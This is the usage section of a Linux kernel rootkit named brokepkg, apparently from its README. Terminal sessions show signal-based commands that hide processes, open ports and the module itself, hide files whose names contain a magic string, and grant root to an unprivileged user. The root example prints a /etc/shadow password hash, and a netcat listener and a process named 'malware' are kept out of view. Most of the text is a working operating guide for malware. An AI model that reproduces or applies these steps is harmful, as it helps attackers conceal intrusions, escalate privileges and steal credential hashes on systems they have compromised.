Usage

Using your rootkit

Now that the rootkit is installed, let's see all features and how to use and communicate with them.

All signals definitions can be found in "include/hooks.h" enum and MAGIC_HIDE in "include/config.h"

Hide/unhide any process by sending a signal SIGMODINVIS:

Default sig is 63, the pid sent will toggle between hide/unhide state.

root@broke:~# ps aux | grep '[n]c -nlvp'
root      4062  0.0  0.0  13600  1100 pts/2    S+   02:04   0:00 nc -nlvp 9001
root@broke:~# kill -63 4062
# invisible process
root@broke:~# ps aux | grep '[n]c -nlvp'
# but stay alive
root@broke:~# echo process live | nc 0 9001

Making the module become (in)visible by sending a signal SIGHIDE:

Default sig is 31, the pid will be ignored, so it can be any number.

On non-debug build, module auto hide itself.

root@broke:~# lsmod | grep broke
brokepkg              147456  0
root@broke:~# kill -31 0
# module is now invisible
root@broke:~# lsmod | grep broke
root@broke:~# kill -31 0
root@broke:~# lsmod | grep broke
brokepkg              147456  0

Become a root user by sending a signal SIGROOT:

Default sig is 64, the pid will be ignored, so it can be any number.

ubuntu@broke:~$ id -u && head -1 /etc/shadow
1003
head: cannot open '/etc/shadow' for reading: Permission denied
ubuntu@broke:~$ kill -64 0
ubuntu@broke:~$ id -u && head -1 /etc/shadow
0
root:$6$kXyEb.NF$F60TjtZ8vC1eo183BWbGi5NlBWAkQxjo/Uwm4.CvIv2ek2hdkgJQtrUGfiXmh6nmRf/R4LMwk7JzLfGZdllWN1:19381:0:99999:7:::

Hide/unhide any port by sending a signal SIGPORT:

Default sig is 62, the pid sent will be used as port to toggle hide/unhide state.

root@broke:~# netstat -nlpt | grep malware
tcp        0      0 0.0.0.0:9001            0.0.0.0:*               LISTEN      4321/./malware      
root@broke:~# kill -62 9001 # port number
root@broke:~# netstat -nlpt | grep malware
root@broke:~# 

Files or directories contain the MAGIC_HIDE pattern will become invisible:

Default value is br0k3_n0w_h1dd3n.

root@broke:~# mkdir br0k3_n0w_h1dd3n
root@broke:~# ls -la
total 12
drwxr-xr-x 3 root root 4096 Feb  9 02:39 .
drwxr-xr-x 3 root root 4096 Feb  9 02:39 ..
drwxr-xr-x 2 root root 4096 Feb  9 02:35 br0k3_n0w_h1dd3n
root@broke:~# echo 'my malware or c2' > br0k3_n0w_h1dd3n/malware
root@broke:~# sudo insmod /brokepkg.ko
root@broke:~# ls -la
total 8
drwxr-xr-x 2 root root 4096 Feb  9 02:40 .
drwxr-xr-x 3 root root 4096 Feb  9 02:39 ..
root@broke:~# echo -ne '#!/bin/sh\necho executed from hide fs' > br0k3_n0w_h1dd3n/hide.sh
root@broke:~# chmod +x br0k3_n0w_h1dd3n/hide.sh
root@broke:~# ./br0k3_n0w_h1dd3n/hide.sh
executed from hide fs
root@broke:~# ls -la
total 8
drwxr-xr-x 2 root root 4096 Feb  9 02:40 .
drwxr-xr-x 3 root root 4096 Feb  9 02:39 ..
root@broke:~#